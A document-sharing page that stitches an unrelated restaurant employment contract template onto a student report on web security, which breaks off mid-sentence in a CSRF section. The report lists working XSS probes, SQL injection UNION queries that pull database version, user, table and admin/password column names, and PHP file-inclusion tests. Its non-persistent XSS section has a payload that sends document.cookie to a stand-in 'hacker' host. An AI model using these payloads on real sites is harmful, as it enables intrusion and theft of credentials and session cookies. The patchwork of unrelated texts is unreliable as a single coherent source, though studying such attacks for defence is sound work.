版權(quán)說明:本文檔由用戶提供并上傳,收益歸屬內(nèi)容提供方,若內(nèi)容存在侵權(quán),請進(jìn)行舉報(bào)或認(rèn)領(lǐng)
文檔簡介
機(jī)械通氣指南餐飲員工聘用合同餐飲員工聘用合同
/餐飲員工聘用合同餐飲員工聘用合同甲方:??乙方:?甲方聘用乙方為正式員工,雙方經(jīng)過平等協(xié)商,彼此同意約定下述條款以共同遵守。?第一條本合同于________年_______月_______日生效,期限________年,其中試用期至______年_____月______日止。第二條:乙方的考勤與管理悉按甲方有關(guān)人事管理制度辦理。?第三條:乙方的職務(wù)或工種為:。乙方每周工作時(shí)間為________天,每天工作________小時(shí);乙方應(yīng)按照工作職責(zé)保證完成甲方規(guī)定的工作和任務(wù)。?第四條:乙方的工作職責(zé)、事項(xiàng)由甲方依乙方的職務(wù)或工種,并視乙方能力及甲方需要進(jìn)行分派。第五條:甲方根據(jù)工作需要,要求乙方加班時(shí),除不可抗拒的事由外,乙方應(yīng)予配合,有關(guān)加班事宜,依員工手冊辦理。?第六條:乙方的工作報(bào)酬:(一)甲方應(yīng)按月支付乙方報(bào)酬,乙方的工資待遇定為,并可享受甲方規(guī)定的津貼福利和獎(jiǎng)勵(lì)。?(二)甲方可參考下列事項(xiàng)調(diào)整乙方職務(wù)等乙方每月工作考核記錄;乙方工作職務(wù)(或工種)變換情況;勞務(wù)市場供需狀況及社會(huì)經(jīng)濟(jì)發(fā)展一般水平。(三)甲方在以下情況有權(quán)扣除乙方相應(yīng)額度的勞務(wù)報(bào)酬:因乙方的過失給甲方造成經(jīng)濟(jì)損失的;乙方違反公司管理制度的;雙方約定的其他情況。第七條未經(jīng)甲方許可,乙方不得承接與乙方職責(zé)相關(guān)的個(gè)人業(yè)務(wù)。?第八條:乙方每月工資由甲方于次月日發(fā)放。若工資發(fā)放日適逢周日或假日,甲方得提前或推后一日或數(shù)日發(fā)放。?第十條乙方有下列情形之一,甲方可以解除本合同:(一)在試用期間被證明不符合錄用條件的;(二)嚴(yán)重違反甲方有關(guān)規(guī)定及按照本合同約定可以解除勞務(wù)合同的;(三)嚴(yán)重失職,營私舞弊,對甲方利益造成重大損害的;(四)被依法追究刑事責(zé)任的。第十一條:甲方因業(yè)務(wù)萎縮時(shí)有權(quán)終止本合同,并提前一個(gè)月通知乙方。?第十二條:乙方主動(dòng)提出解除本合同時(shí),須提前一個(gè)月通知甲方,調(diào)離時(shí),乙方須按員工手冊辦理有關(guān)手續(xù)。?第十三條:乙方聲明:乙方在簽署本合同時(shí),業(yè)已獲得員工手冊,并知悉全文,愿意遵守各項(xiàng)規(guī)定。第十四條:本合同一式兩份,甲、乙雙方各執(zhí)一份,經(jīng)雙方簽章后于年月日起生效。第十五條:合同期滿如未續(xù)簽,則視為本合同自行終止,雙方應(yīng)及時(shí)辦理相關(guān)手續(xù)。第十六條:經(jīng)甲乙雙方協(xié)商一致,本合同可以解除。?第十七條:甲乙雙方約定本合同增加以下內(nèi)容:(一)乙方有義務(wù)向甲方提供真實(shí)的個(gè)人信息與相關(guān)證明,并如實(shí)填寫《勞務(wù)人員登記表》,否則甲方有權(quán)隨時(shí)解除本合同,并且不給予經(jīng)濟(jì)補(bǔ)償。(二)甲方有權(quán)對公司的有關(guān)規(guī)定進(jìn)行修改、完善。修改后的內(nèi)容對本合同具有同等效力(三)甲方可以在合同有效期內(nèi),根據(jù)需要調(diào)整乙方的崗位職責(zé)和工作范圍,勞務(wù)報(bào)酬等事項(xiàng)也將做出相應(yīng)調(diào)整。乙方愿意服從甲方的安排。?第十八條:甲、乙雙方就履行本合同所發(fā)生一切爭執(zhí),同意以勞動(dòng)局為第一審理機(jī)關(guān)。??甲方(簽字):乙方(簽字):?身份證號碼:?戶口所在地地址:?聯(lián)絡(luò)方式:
Web前端的認(rèn)識和理解Web前端的認(rèn)識和理解
/Web前端的認(rèn)識和理解Web前端認(rèn)識班級:0441104姓名:夏維;王波學(xué)號:2011211830;2011211832授課教師:董濤
對Web前端的認(rèn)識由于網(wǎng)絡(luò)技術(shù)日趨成熟,黑客們也將注意力從以往對
網(wǎng)絡(luò)服務(wù)器
的攻擊逐步轉(zhuǎn)移到了對Web應(yīng)用的攻擊上。根據(jù)Gartner的最新調(diào)查,信息安全攻擊有75%都是發(fā)生在Web應(yīng)用而非網(wǎng)絡(luò)層面上。同時(shí),數(shù)據(jù)也顯示,三分之二的Web站點(diǎn)都相當(dāng)脆弱,易受攻擊。然而現(xiàn)實(shí)確是,絕大多數(shù)企業(yè)將大量的投資花費(fèi)在網(wǎng)絡(luò)和服務(wù)器的安全上,沒有從真正意義上保證Web應(yīng)用本身的安全,給黑客以可乘之機(jī)。一、Web的介紹web的起源Web是WorldWideWeb的簡稱,中文稱之為萬維網(wǎng),是用于發(fā)布、瀏覽、查詢信息的網(wǎng)絡(luò)信息服務(wù)系統(tǒng),由許多遍布在不同地域內(nèi)的Web服務(wù)器有機(jī)地組成Web架構(gòu)的精妙處從技術(shù)層面上看,Web架構(gòu)的精華有三處:用超文本技術(shù)(HTML)實(shí)現(xiàn)信息與信息的連接;用統(tǒng)一資源定位技術(shù)(URL)實(shí)現(xiàn)全球信息的精確定位;用新的應(yīng)用層協(xié)議(HTTP)實(shí)現(xiàn)分布式的信息共享。Web技術(shù)涉及的技術(shù)Web是一種典型的分布式應(yīng)用架構(gòu)。Web應(yīng)用中的每一次信息交換都要涉及到客戶端和服務(wù)端兩個(gè)層面。因此,Web開發(fā)技術(shù)大體上也可以被分為客戶端技術(shù)和服務(wù)端技術(shù)兩大類。(1)客戶端技術(shù)①HTML語言的誕生Web客戶端的主要任務(wù)是展現(xiàn)信息內(nèi)容,HTML語言是信息展現(xiàn)的最有效載體之一。作為一種實(shí)用的超文本語言,1990年,第一個(gè)圖形化的Web瀏覽器"WorldWideWeb"終于可以使用一種為Web度身定制的語言--HTML來展現(xiàn)超文本信息了。②從靜態(tài)信息到動(dòng)態(tài)信息最初的HTML語言只能在瀏覽器中展現(xiàn)靜態(tài)的文本或圖像信息,隨后由靜態(tài)技術(shù)向動(dòng)態(tài)技術(shù)逐步轉(zhuǎn)變。1997年,Microsoft發(fā)布了IE4.0,并將動(dòng)態(tài)HTML標(biāo)記、CSS和動(dòng)態(tài)對象模型發(fā)展成了一套完整、實(shí)用、高效的客戶端開發(fā)技術(shù)體系,Microsoft稱其為DHTML。同樣是實(shí)現(xiàn)HTML頁面的動(dòng)態(tài)效果,DHTML技術(shù)無需啟動(dòng)Java虛擬機(jī)或其他腳本環(huán)境,可以在瀏覽器的支持下,獲得更好的展現(xiàn)效果和更高的執(zhí)行效率。為了在HTML頁面中實(shí)現(xiàn)音頻、視頻等更為復(fù)雜的多媒體應(yīng)用,又引入了對QuickTime插件的支持。Realplayer插件、Microsoft自己的媒體播放插件MediaPlayer也被預(yù)裝到了各種Windows版本之中。隨后Flash插件的橫空出世。(2)服務(wù)端技術(shù)與客戶端技術(shù)從靜態(tài)向動(dòng)態(tài)的演進(jìn)過程類似,Web服務(wù)端的開發(fā)技術(shù)也是由靜態(tài)向動(dòng)態(tài)逐漸發(fā)展、完善起來的。二、漏洞挖掘?漏洞挖掘技術(shù)一直是網(wǎng)絡(luò)攻擊者最感興趣的問題,漏洞挖掘的范圍也在隨著技術(shù)的提升而有所變化.在前期針對緩沖區(qū)溢出格式化字符串堆溢出lib庫溢出等技術(shù)都是針對ELF文件或者PE文件的漏洞挖掘技術(shù).在針對ELF文件PE文件如strcpymemcpy等存在緩沖區(qū)溢出遺患的C函數(shù),所以通過審計(jì)源代碼的辦法來進(jìn)行漏洞挖掘是一個(gè)可能性系數(shù)很小的漏洞挖掘技術(shù),而針對軟件的黑盒子測試雖然也能找到一些軟件的漏洞,但可能性系數(shù)也會(huì)較小,在國外的一些進(jìn)行漏洞挖掘的辦法已經(jīng)慢慢的提升為自己寫黑盒子測試代碼,然后針對系統(tǒng)或軟件的某個(gè)功能模塊進(jìn)行模塊化的漏洞挖掘技術(shù).例如Linux內(nèi)核的很多漏洞都是通過fuzzing技術(shù)找到的,fuzzing即模糊測試的意思,大家可以理解為類似SQL盲注入類型的攻擊技術(shù).網(wǎng)絡(luò)安全的界限在不斷的提升,目前緩沖區(qū)溢出漏洞已經(jīng)如MSSQL注入般的被很多人堵死,而在進(jìn)行網(wǎng)絡(luò)入侵滲透的過程中,很多人滲透成功的著力點(diǎn)都是通過WEB開始的,當(dāng)然有些人是通過MSSQL注入,有些人通過其它的WEB漏洞技術(shù)一步步的走到了入侵成功的步驟.我們下面將會(huì)討論一些WEB漏洞挖掘的簡單技術(shù),通過這些簡單技術(shù)的規(guī)則,然后配合經(jīng)驗(yàn)的提高,大家或許會(huì)得到意想不到的效果.WEB漏洞的分類1、SQL注入??SQL注入漏洞,是依靠存在弱點(diǎn)的WEB腳本代碼,來實(shí)現(xiàn)通過瀏覽器執(zhí)行任意SQL語句,從而實(shí)現(xiàn)最終獲取某種權(quán)限的攻擊技術(shù).SQL注入的關(guān)鍵部分在于對元數(shù)據(jù)的利用,所謂元數(shù)據(jù)即數(shù)據(jù)庫的基礎(chǔ)數(shù)據(jù).例如我們可以通過database()version()來獲得數(shù)據(jù)庫的名稱及版本,而我們通過SQL內(nèi)置函數(shù)獲得的這些內(nèi)容都屬于數(shù)據(jù)庫元數(shù)據(jù)的內(nèi)容.理解了元數(shù)據(jù)的概念,在后面的章節(jié)我會(huì)給大家簡單的講解下通過元數(shù)據(jù)來獲取MySQL的數(shù)據(jù)表.2、文件包含類型,如PHP的的遠(yuǎn)程本地文件包含漏洞
??文件包含漏洞是PHP程序特有的一個(gè)弱點(diǎn)攻擊,原理就是在使用include時(shí)沒有安全的編程,而能夠找到文件包含漏洞則是入侵一個(gè)WEB系統(tǒng)的很重要的因素,有了文件包含漏洞則可以很快速的達(dá)到上傳WEBSHELL,然后本地提升權(quán)限的作用.3、XSS?XSS漏洞是被很多人遺忘的漏洞,但是XSS也是一個(gè)比較危險(xiǎn)的安全隱患,我看到很多國內(nèi)介紹XSS漏洞的文章大部分在如何欺騙管理員獲得后臺登陸帳戶或者管理員的cookies文件.但這些僅僅是XSS漏洞的簡單用法,如果尋找到的XSS漏洞可以任意執(zhí)行任Javascript腳本,那安全性也是不容忽視的.通過Javascript腳本其實(shí)也可以做一些惡意的攻擊,甚至可以獲得一些WEB程序的源代碼,當(dāng)然這個(gè)要看大家對Javascript腳本的熟悉程度.例如我們這幾天公布的這個(gè)可跨站執(zhí)行任意Javascript腳本的漏洞,最后我也通過這個(gè)漏洞給客戶演示了如何獲取他們的服務(wù)器信息,并最終實(shí)現(xiàn)得到其一定權(quán)限的方法.同時(shí)例如session騙cookies欺騙,目前我也把這些規(guī)入了XSS漏洞的范圍,當(dāng)然僅僅研究這兩個(gè)技術(shù)也是很值得大家去深入的進(jìn)行漏洞挖掘的.二、WEB漏洞挖掘規(guī)則漏洞挖掘規(guī)則需要一個(gè)WEB瀏覽器,如IEFirefox等即可,無需讀取WEB程序的源代碼,只要某個(gè)規(guī)則符合了漏洞規(guī)則的要求,即可以采取相關(guān)的漏洞攻擊技術(shù)進(jìn)行相應(yīng)的漏洞攻擊辦法例如:
http://website/index1.php?id=<script>alert
("111")</script>,如果對方的代碼過濾了"雙引號,那么可以通過
http://website/index1.php?id=<script>alert
('111')</script>,采用'單引號測試,若單引號也過濾呢?OK,我們這樣來測試
http://website/index1.php?id=<script>alert(111)</script
>,使用數(shù)字提交,這樣測試XSS的漏洞就擴(kuò)展到了三條,通過構(gòu)造HTML語句來實(shí)現(xiàn)XSS漏洞的挖掘等等.XSS的漏洞挖掘規(guī)則
http://website/index1.php?id=<script>alert("111")</script
>
http://website/index1.php?id=<script>alert
('111')</script>
http://website/index1.php?id=<script>alert
(111)</script>
http://website/index1.php?id=<body+onload=alert
("1111")>
http://website/index1.php?id=<body+onload=alert
('1111')>
http://website/index1.php?id=<body+onload=alert
(1111)>
http://website/index1.php?id=<img+src=http://OtherWebSite/x.gif+onload=alert
("1111")>
http://website/index1.php?id=<img+src=http://OtherWebSite/x.gif+onload=alert
('1111')>
http://website/index1.php?id=<img+src=http://OtherWebSite/x.gif+onload=alert
(1111)>
http://website/index1.php?id=<"
http://website/index1.php?id=<'
http://website/index1.php?id=<
http://website/index1.php?id=<!--
http://website/index1.php?id=-->
http://website/index1.php?id=<!--
?-->
使用上面的這些簡單漏洞規(guī)則,如果模糊測試一些站點(diǎn)的話,可以找到一些XSS漏洞。
下面的這四個(gè)語句判斷是否存在mysql注入,其中'號類型的測試已經(jīng)不是很可行,特別在PHP5和mysql5的環(huán)境下:)
http://website/index1.php?id=1'
?
http://website/index1.php?id=1
?and1=1
http://website/index1.php?id=1
?and1=2
http://website/index1.php?id=1
?orderby4//4為判斷該表的列數(shù),直到猜測到為止
下面的語句來獲取mysql的一些信息,這里我們假設(shè)我們使用orderby語句判斷出的列數(shù)為4
http://website/index1.php?id=1
?and1=1unionselect1,2,3,4
http://website/index1.php?id=1
?and1=1unionselectversion(),database(),user(),4
http://website/index1.php?id=1
?and1=1unionselect1/*
http://website/index1.php?id=1
?and1=1unionselectversion()/*
http://website/index1.php?id=1
?and1=1unionselectdatabse()/*
猜測表名:
http://website/index1.php?id=1
?and1=1unionselect1,2,3,4fromdatabase.tablewhere1=2
//where1=2不打印猜測表的內(nèi)容
adminuserarticlesnews必須在指定select的字段個(gè)數(shù)再使用,否則mysql會(huì)報(bào)錯(cuò).
http://website/index1.php?id=1
?and1=1unionselecttable_schema,table_name,table_rows,table_countfrominformation_schema.tables//上面使用數(shù)據(jù)庫的元數(shù)據(jù)來獲取mysql的信息,前提是系統(tǒng)管理員沒有禁止mysql普通用戶對元數(shù)據(jù)庫的表查詢,如果禁止了則該辦法是無效的.在開始分析mysql數(shù)據(jù)庫到底可以執(zhí)行到那種程度的注入情況下分析了mysql的系統(tǒng)架構(gòu),最終發(fā)現(xiàn)通過information_schema數(shù)據(jù)庫提供給mysql用戶的元數(shù)據(jù)可以得到一些mysql數(shù)據(jù)庫的基本信息,例如得到數(shù)據(jù)庫的各個(gè)表信息等,還可以得到數(shù)據(jù)庫的權(quán)限設(shè)置等信息,information_schema數(shù)據(jù)庫用到的表的具體字段
1:KEY_COLUMN_USAGE表constraint_schema:存放數(shù)據(jù)庫名table_schema:存放數(shù)據(jù)庫名table_name:存放數(shù)據(jù)庫表信息column_name:存放數(shù)據(jù)庫的字段信息,一般可以獲取第一個(gè)字段或者自增字段的信息2:SCHEMA表schema_name:存放數(shù)據(jù)庫名default_charater_set_name:存放charset類型default_collation_name:存放charset相關(guān)信息3:SCHEMA_PRIVILEGES表grantee:存放數(shù)據(jù)庫用戶名table_schema:表名privilege_type:權(quán)限4:STATISTICS表table_schema:存放數(shù)據(jù)庫名table_name:存放表名index_schema:數(shù)據(jù)庫名index_name:是否縮引column_name:存放索引自增字段5:TABLES表table_schema:存放數(shù)據(jù)庫名table_name:存放表名table_type:表類型SYSTEMorBASETABLEengin:MEMORYMYISAMInnoDBversion:table_rows:表的行數(shù)auto_increment:自增的總行數(shù)create_time:創(chuàng)建表的時(shí)間update_time:更新表的時(shí)間create_options:創(chuàng)建表時(shí)的約束條件
有了這些以后,如果對方系統(tǒng)管理員忽略了這些,則可以達(dá)到我們不需要猜測表名而直接獲取數(shù)據(jù)庫表名的結(jié)果.
猜測列名:
http://website/index1.php?id=1
?and1=1unionselectusername,2,3,4fromuserwhere1=2按照這個(gè)規(guī)則依次類推,如果我們猜測到user表存在username字段,則程序執(zhí)行是正常的,否則程序會(huì)出錯(cuò),也可以使用where1=1來打印表的信息,通過這樣的辦法就可以獲取mysql數(shù)據(jù)庫的某些關(guān)鍵表的字段信息,如:admin與password:)C:文件包含漏洞
??文件包含漏洞的測試,有以下幾個(gè)比較簡單且有效的辦法.1:新建一個(gè)簡單的php代碼,如:<?phpinfo();?>,保存為*.txt格式2:新建一個(gè)簡單的php代碼,如:<?phpinfo();?>,保存為無后綴格式然后我們測試時(shí)只需要采取下面簡單的辦法即可,這里我們假設(shè)我們下面的文件URL為
/include.txt
/include
漏洞規(guī)則
http://website/file.php?inc=/include.txt
http://website/file.php?inc=/include.txt
http://website/file.php?inc=/include
http://website/file.php?inc=/include
使用上面的簡單規(guī)則即可實(shí)現(xiàn)文件包含漏洞的測試,當(dāng)然得根據(jù)具體的返回信息來判斷.例如從XSS漏洞的檢測規(guī)則可能會(huì)發(fā)現(xiàn)包含文件漏洞,如果知道PHP的某個(gè)函數(shù)存在緩沖區(qū)溢出,我們假設(shè)這個(gè)PHP的內(nèi)置函數(shù)為phphtml(char*str),假設(shè)
http://website/file.php?inc=test
,這里的參數(shù)inc經(jīng)過PHP代碼時(shí)使用了phphtml內(nèi)置函數(shù),則可以使用下面的辦法來觸發(fā)漏洞
(n為觸發(fā)漏洞的最大字符數(shù))當(dāng)然類似這樣的漏洞是需要寫程序來自動(dòng)運(yùn)行的,然后來觸發(fā)溢出并執(zhí)行shellcode.但這里也存在一個(gè)問題,即一般情況下,類似PHP本身的溢出漏洞的利用是有些難度存在的.三:XSS的概述最重要的要了解XSS漏洞的是,他們是目前為止發(fā)現(xiàn)的,在所有網(wǎng)站超過80%比例的定制Web應(yīng)用程序中最常見的漏洞。雖然跨站點(diǎn)腳本在一段時(shí)間內(nèi)一直被認(rèn)為是中等程度的的漏洞,但XSS蠕蟲和病毒的出現(xiàn),已經(jīng)提高了XSS的評估。軟件開發(fā)人員和安全專業(yè)人員需要知道它是多么簡單,以防止代碼開發(fā)過程中出現(xiàn)XSS漏洞,并且一經(jīng)查出,他們是多么容易解決。XSS是一種攻擊技術(shù),它使得一個(gè)網(wǎng)站,寫出攻擊者提供的可執(zhí)行代碼,然后加載在用戶的Web瀏覽器。也就是說,當(dāng)黑客使用存在漏洞的網(wǎng)站作為攻擊的通道時(shí),用戶是預(yù)定的受害者。1、非持久性xss想想看,一個(gè)黑客想使用“http://victim/”網(wǎng)站對用戶進(jìn)行XSS攻擊。黑客會(huì)采取的第一個(gè)步驟是在http://victim/找出一個(gè)XSS漏洞,然后構(gòu)造一個(gè)特制的URL,也被稱為鏈接。要做到這一點(diǎn),黑客會(huì)搜尋網(wǎng)站上的客戶端提供的數(shù)據(jù)可以被發(fā)送到Web服務(wù)器,然后回顯到屏幕上的任何功能,比如搜索框。常見的在線發(fā)布的博客。XSS漏洞往往出現(xiàn)在搜索框表單。在搜索字段中輸入“testsearch”,響應(yīng)頁面將用戶輸入的文本在顯示在三個(gè)不同的位置,查詢字符串中包含值為“test+search”的“search”參數(shù)。這個(gè)URL值可以在運(yùn)行時(shí)更改,甚至包括HTML/JavaScript的內(nèi)容。http://victim/,http://victim/search.pl?search=test+search其3展示了原來的搜索詞被替換為下面的HTML/JavaScript代碼時(shí)會(huì)發(fā)生什么:Example1.”><SCRIPT>alert(‘XSS%20Testing’)</SCRIPT>結(jié)果頁面彈出了一個(gè)無害的警告對話框。根據(jù)提示,提交的代碼已經(jīng)成為web頁面的一部分,證明了JavaScript已進(jìn)入到http://victim/的上下文并得到執(zhí)行。其4展示了夾雜有新的HTML/JavaScript代碼的Web頁面的HTML源代碼。其3,原來的搜索詞將被替換為HTML/JavaScript代碼。其4,夾雜有新的HTML/JavaScript代碼的Web頁面的HTML源代碼。此時(shí),黑客將會(huì)繼續(xù)修改這個(gè)URL,包含更復(fù)雜的XSS攻擊來利用用戶。一個(gè)典型的例子是一個(gè)簡單的cookie盜竊的攻擊。Example2.“><SCRIPT>var+img=new+Image();img.src=”http://hacker/”%20+%20document.cookie;</SCRIPT>前面的JavaScript代碼創(chuàng)建一個(gè)圖像DOM(文檔對象模型)對象。varimg=newImage();因?yàn)镴avaScript代碼在“http://victim/”上下文中執(zhí)行,所以它可以訪問cookie數(shù)據(jù)。document.cookie;圖形對象然后指派一個(gè)外域的URL發(fā)送帶有Web瀏覽器的Cookie字符串的數(shù)據(jù)到“http://hacker/”。img.src=”http://hacker/”+document.cookie;下面是一個(gè)例子,是一個(gè)被發(fā)送的HTTP請求。Example3.GEThttp://hacker/path/_web_browser_cookie_dataHTTP/1.1Host:hostContent-length:0一旦黑客完成了他的攻擊代碼,他會(huì)通過垃圾郵件,留言板的帖子,即時(shí)消息和其他方法宣傳這種特制的鏈接,試圖吸引用戶點(diǎn)擊。是什么讓這種攻擊這么有效?用戶可能點(diǎn)擊正常的網(wǎng)絡(luò)釣魚郵件7中的鏈接是因?yàn)檫@個(gè)URL包含了真正的網(wǎng)站域名,而不是一種外觀相似的域名或隨機(jī)的IP地址。應(yīng)當(dāng)注意的是,過長的XSS鏈接可以使用URL縮短服務(wù),如TinyURL.com進(jìn)行偽裝。2、持久型XSS持久型XSS攻擊最常發(fā)生在由社區(qū)內(nèi)容驅(qū)動(dòng)的網(wǎng)站或Web郵件網(wǎng)站,不需要特制的鏈接來執(zhí)行。黑客僅僅需要提交XSS漏洞利用代碼到一個(gè)網(wǎng)站上其他用戶可能訪問的地方。這些地區(qū)可能是博客評論,用戶評論,留言板,聊天室,HTML電子郵件,wikis,和其他的許多地方。一旦用戶訪問受感染的網(wǎng)頁,執(zhí)行是自動(dòng)的。這使得持續(xù)性的XSS的危險(xiǎn)性比非持久性高,因?yàn)橛脩魶]有辦法保護(hù)自己。一旦黑客成功在某個(gè)頁面注入了漏洞利用代碼,他將宣傳受感染頁面的URL來希望不知情的用戶中招。即使用戶對非持續(xù)性XSS的URL懂得識別,也會(huì)很容易的受到影響。無論使用非持續(xù)性或持續(xù)性的XSS漏洞,黑客可以利用用戶,導(dǎo)致網(wǎng)絡(luò)和財(cái)務(wù)上的損失,有許多的方法。2、傳播的方法對于一個(gè)病毒或蠕蟲想要成功,它需要一個(gè)執(zhí)行和傳播的方法。電子郵件病毒通常在鼠標(biāo)點(diǎn)擊后執(zhí)行,然后通過您的聯(lián)系人列表來發(fā)送帶有惡意軟件的的郵件進(jìn)行傳播。網(wǎng)絡(luò)蠕蟲利用遠(yuǎn)程利用漏洞危害機(jī)器和并且通過連接到其他存在漏洞的主機(jī)進(jìn)行傳播。除傳播之外,蠕蟲病毒還是高度多樣化,包括創(chuàng)造DDoS僵尸網(wǎng)絡(luò),垃圾郵件僵尸,或遠(yuǎn)程鍵盤監(jiān)控的能力。XSS蠕蟲與其他形式的惡意軟件相似,但以自己獨(dú)特的方式執(zhí)行和傳播。使用一個(gè)網(wǎng)站來存放惡意代碼,XSS蠕蟲和病毒通過控制Web瀏覽器,使得它復(fù)制惡意軟件到網(wǎng)絡(luò)上的其他地方去感染別人來進(jìn)行傳播。例如,一個(gè)含有惡意軟件的博客評論,可以使用訪問者的瀏覽器發(fā)布額外的感染性的博客評論。XSS蠕蟲病毒可能會(huì)使得瀏覽器進(jìn)行發(fā)送電子郵件,轉(zhuǎn)賬,刪除/修改數(shù)據(jù),入侵其他網(wǎng)站,下載非法內(nèi)容,以及許多其他形式的惡意活動(dòng)。用最簡單的方式去理解,就是如果沒有適當(dāng)?shù)姆烙诰W(wǎng)站上的任何功能都可以在未經(jīng)用戶許可的情況下運(yùn)行。在最后一節(jié)中,我們將重點(diǎn)放在XSS漏洞本身,以及用戶可以怎么樣被利用?,F(xiàn)在,我們來看XSS惡意軟件是如何可以進(jìn)行遠(yuǎn)程通信。XSS漏洞利用代碼,通常是HTML/JavaScript,使用三種方式使得瀏覽器發(fā)送遠(yuǎn)程HTTP請求的瀏覽器:嵌入式的HTML標(biāo)簽,JavaScriptDOM的對象,XMLHTTPRequest。3、嵌入式HTML標(biāo)簽一些HTML標(biāo)簽具有在頁面加載時(shí)會(huì)自動(dòng)發(fā)起Web瀏覽器的HTTP請求的屬性。有一個(gè)例子是IMG的SRC屬性。SRC屬性用于指定在Web頁面中顯示的圖像文件的URL地址。當(dāng)你的瀏覽器載入帶有IMG標(biāo)簽的網(wǎng)頁,圖像會(huì)自動(dòng)被請求,并在瀏覽器中顯示。但是,SRC屬性也可以被用于任何Web服務(wù)器的其他URL,不僅僅是包含圖像的。例如,如果我們進(jìn)行了谷歌搜索“WhiteHatSecurity”我們最終得到了下面的URL:這個(gè)URL可以很容易地取代IMG內(nèi)的SRC屬性的值,從而迫使您的Web瀏覽器中執(zhí)行相同的谷歌搜索。<img顯然使得Web瀏覽器發(fā)送一個(gè)谷歌搜索請求是沒有什么危害性的。然而,URL構(gòu)建的同樣的過程可以用來使得Web瀏覽器自動(dòng)進(jìn)行銀行賬戶資金的匯款,發(fā)表煽動(dòng)性言論,甚至入侵網(wǎng)站。這一點(diǎn)可以說明,這是一個(gè)迫使一個(gè)Web瀏覽器連接到其他網(wǎng)站,使的XSS蠕蟲病毒傳播的機(jī)制。5、JavaScript和文檔對象模型JavaScript被用于給網(wǎng)站訪問者一個(gè)豐富的、交互式的體驗(yàn)。這些網(wǎng)頁更接近于一個(gè)軟件應(yīng)用程序,而不是一個(gè)靜態(tài)的HTML文檔。我們常會(huì)看到JavaScript被用于進(jìn)行圖像的翻轉(zhuǎn),動(dòng)態(tài)表單輸入檢查,彈出對話框,下拉菜單,拖動(dòng)和拖放等。JavaScript有接近完全的對網(wǎng)站上的每一個(gè)對象,包括圖像,cookies,窗口,框架和文本內(nèi)容的訪問。這些對象中的每一個(gè)都是文檔對象模型的一部分。DOM提供了一系列JavaScript讀取和操作的應(yīng)用程序編程接口。類似嵌入式HTML標(biāo)簽的功能,JavaScript可以操縱DOM對象自動(dòng)發(fā)起Web瀏覽器的HTTP請求。圖像和窗口的源URL可以被重新指定為其他URL的。我們可以使用JavaScript來改變圖像的DOM對象SRC進(jìn)行谷歌搜索“WhiteHatSecurity”。img[0].src迫使Web瀏覽器連接到其他網(wǎng)站發(fā)送一個(gè)谷歌搜索請求是一種無害的例子。但這也說明了XSS惡意軟件傳播的另一種方法。四、HTML5安全五種可能會(huì)利用HTML5的功能進(jìn)行攻擊的方法:1、表單篡改:另一個(gè)新功能讓攻擊者可以在被注入JavaScript的網(wǎng)站(例如XSS攻擊)中更改該網(wǎng)頁上的表單行為。舉例來說,攻擊者可以改變一個(gè)網(wǎng)絡(luò)商店的正常行為,不是將內(nèi)容送到購買或是登錄頁面,而是將用戶的身分認(rèn)證信息發(fā)送到攻擊者自己的網(wǎng)站。2、利用地理定位追蹤受害者:地理定位是HTML5新功能中最受注目的一個(gè)。因?yàn)榘踩碗[私的考慮,網(wǎng)站必須先得到用戶的批準(zhǔn),隨后才能獲得位置訊息。然而就和以前出現(xiàn)過的其他功能一樣,例如Vista的用戶帳戶控制,Android的應(yīng)用程序權(quán)限,還有無效的HTTPS憑證等,這些需要用戶作決定的安全措施幾乎沒有任何效果。而一旦有了授權(quán),網(wǎng)站不僅可以知道受害者的位置,而且還可以在用戶移動(dòng)時(shí)對其進(jìn)行實(shí)時(shí)追蹤。3、利用桌面通知做社會(huì)工程學(xué)攻擊:我們在HTML5的五大優(yōu)秀功能文章中曾經(jīng)提到過HTML5的一個(gè)新功能:桌面通知。這些出現(xiàn)在
瀏覽器
之外的彈出窗口,其實(shí)是可以用HTML程序代碼進(jìn)行定制的。雖然這種功能帶來了很不錯(cuò)的交互方式,但也可能導(dǎo)致社會(huì)工程學(xué)攻擊,例如網(wǎng)絡(luò)釣魚或者假冒
殺毒
軟件等??纯聪旅娴膱D片就可以想象到,攻擊者可以如何利用這個(gè)新功能了。4、利用跨域請求或WebSockets的端口掃描:有了HTML5,瀏覽器現(xiàn)在可以連到任何IP地址或網(wǎng)站的(幾乎)任何端口。雖然除非目標(biāo)網(wǎng)站有特別的允許,不然并不能接收到來自任意端口連接的回應(yīng),但是研究人員表示,這類請求所花的時(shí)間可以用來判斷目標(biāo)端口是打開的還是關(guān)閉的。因此攻擊者就可以直接利用瀏覽器對受害者的內(nèi)部網(wǎng)絡(luò)進(jìn)行端口掃描。5、點(diǎn)擊劫持更加容易:點(diǎn)擊劫持本身不是種新的攻擊,這種攻擊的目的是竊取受害者的鼠標(biāo)按鈕點(diǎn)擊,然后將點(diǎn)擊定向到攻擊者所指定的其他頁面。攻擊者的目的是讓用戶在不知情的情況下點(diǎn)擊隱藏的鏈接。目前,對于點(diǎn)擊劫持最好的服務(wù)器端防御措施之一是被稱為Framekilling的技術(shù)。本質(zhì)上來說,受到影響的網(wǎng)站可以利用
Java
Script來驗(yàn)證自己是否在一個(gè)iframe中運(yùn)行,如果是的話,就拒絕顯示頁面內(nèi)容。這種技術(shù)已經(jīng)被在用在Facebook、Gmail和其他一些網(wǎng)站中。但是HTML5在iframe中增加了一個(gè)新的沙盒屬性,該屬性會(huì)讓網(wǎng)站停止執(zhí)行
JavaScript
腳本。在大多數(shù)情況下,這其實(shí)是比較安全的做法,但也存在缺點(diǎn),就是會(huì)抵消目前對點(diǎn)擊劫持最好的防御措施。五、CSRFCSRF是跨站請求偽造,也被稱為“oneclickattack”或者sessionriding,通常縮寫為CSRF或者XSRF,是一種對網(wǎng)站的惡意利用。盡管聽起來像跨站
腳本
